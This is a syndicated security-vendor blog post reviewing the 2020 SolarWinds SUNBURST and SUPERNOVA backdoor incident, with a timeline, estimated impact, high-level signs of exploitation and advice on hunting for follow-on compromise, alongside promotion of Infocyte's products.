SUNBURST – Where We Are Now – 2021

Chris Gerritz

I’ve been in the incident response game long enough to know that holiday plans have to be flexible. 2020, a historical year for sure, ended with the discovery of the malicious backdoors known as SUNBURST and SUPERNOVA in SolarWinds software. While the security industry, governments, and the vendor reacted, Infocyte was assisting customers and partners to search for the impacted software and any associated exploitations of it as information continued to be released.

So where are we now? What did we learn? Whats left to be done?


  • March 2020 – Backdoored version of Solarwinds Orion delivered to customers
  • 8 December – FireEye announced it had been attacked by a highly skilled and coordinated adversary
  • 13 December – FireEye investigation leads to discovery of the Solarwinds Orion backdoor dubbed SUNBURST
  • 14 December – Solarwinds filed with the SEC that 13,000 of it’s 300,000 customers were impacted by the backdoored Orion software making it the largest supply chain attack ever
  • 15 December – Microsoft coalition seizes key command and control domain from hackers, stopping any new exploitation of the backdoor (does not stop follow-on access if adversary previously leveraged the backdoor)
  • 15-23 December – Several updates/patches to Orion released addressing the vulnerabilities and backdoors
  • 31 December – Microsoft, a Solarwinds Orion user, announced it’s source code repositories had been accessed via this incident
  • 5 January – US intelligence agencies officially link attack to Russian government (possibly Cozy Bear / APT29) intelligence gathering operation

How Bad Was It Really?

Orion app versions 2019.4 through 2020.2.1, released between March 2020 and June 2020, were tainted with malware. 13,000 customers had these versions installed in their network but not all were exploited by the hackers.

Investigations continue so we assume these numbers will rise but so far the number of organizations with Orion that the hackers are confirmed to have actually accessed is in in the hundreds. Unfortunately these are some of the largest and most sensative targets: Multiple government agencies such as the Commerce and Treasury Department, private companies such as Microsoft, Intel, Nvidia, Cisco, and security companies like FireEye.

We have not even come close to an accounting of the true impact and I suspect we will see more organizations come forward. In addition, the long multi-month access these hackers had in many prominant software vendors should make us assume the hackers at least tried to embed more backdoors in other widely used software.

Given what Infocyte has seen in searching for these compromises, many networks like hospitals, banks, and others that had the vulnerable software showed no evidence of exploitation. Still, many orgs are not able to search for the evidence of explotation or verify if an attack took place if one happened in the past. We assume, unfortunately, that many will just remove Solarwinds and move on.

What Does Exploitation of SUNBURST Look Like?

The SUNBURST and SUPERNOVA backdoors are NOT fully featured malware. It’s simply a small embedded routine that performs some security pre-checks and calls home for instructions. When desired, the backdoor enables the hacker to send their primary malware and commands down to fully take over the server and begin pivoting out to the rest of the targeted network.

Sunburst Malware Scanner Image
Sunburst Malware Scanner Results from Infocyte Platform

Almost all hacking will leave traces and these cases are no different. Exploited networks will have a lot of malicious powershell usage, administrative credential misuse, lateral movement, follow-on in-memory malware injected and alternate persistence mechanisms left behind.

Depending on your endpoint visibility and logging configuration, you should set your expectations:

  • Default logging is woefully inadequate to see most of this. You’ll need an active forensic triage toolset (like Infocyte) to discover artifacts and malware presence
  • Most endpoint protection software will silently log but not alert due to the complexity and false positive potential of such behavior. You’ll need to review these logs manually
  • Only active behavioral monitoring (like Infocyte in monitor-mode) has a chance to alert on some of the post-compromise behavior. Even with alerts, a competent team is often required to handle, analyze and respond to the alerts for this type of behavior. Threat hunters should go back and review these alerts using the publicized indicators of compromise to make sure they didn’t miss anything.

Hunting for Compromise

Whether actively monitoring or not, it’s important to perform an active hunt for above behaviors or the presence of follow-on malware. Infocyte has a hunting extension built just for this purpose to augment our standard hunting routines:

Infocyte Blog: Hunting for SolarWinds Orion Compromises

In several cases, the follow-on malware they sent down was Cobalt Strike, a popular penetration test platform whose source code was cracked and proliferated on the dark web. This malware is in-memory only and has no or few traces on file systems and logs.

Infocyte Blog: Cobalt Strike: The New Favorite Among Thieves

Products like Infocyte find this malware by scanning live memory on all of your system.

Remember, hacking groups like APT29 have certain tactics they use to maintain access to networks they want to retain access to. In the event of a loss of a primary backdoor like SUNBURST, they often have secondary trojans and access paths such as stolen administrative credentials or alternate malware that will re-establish contact at some point in the future. Every incident should be followed up with active hunting for such alternate accesses.

Hunt and Respond with Infocyte

No one should go through a breach alone. If there is anything we can help with, please reach out to us. Existing customers and partners have direct access to our team via the chat interface in the Infocyte app.

For non-Infocyte customers we offer a free version of our platform with our community edition here. This can be used to analyze, assess, and address potential compromises to your network.

Please reach out to us or an infocyte partner if you need assistance. Good hunting!

The post SUNBURST – Where We Are Now – 2021 appeared first on Infocyte.

*** This is a Security Bloggers Network syndicated blog from Blog – Infocyte authored by Chris Gerritz. Read the original post at:

Avatar photo

Chris Gerritz

Chris is a retired Air Force cybersecurity officer and veteran who pioneered defensive cyber threat hunting operations for the U.S. Air Force — standing up their first interactive Defensive Counter Cyberspace (DCC) practice.

chris-gerritz has 12 posts and counting.See all posts by chris-gerritz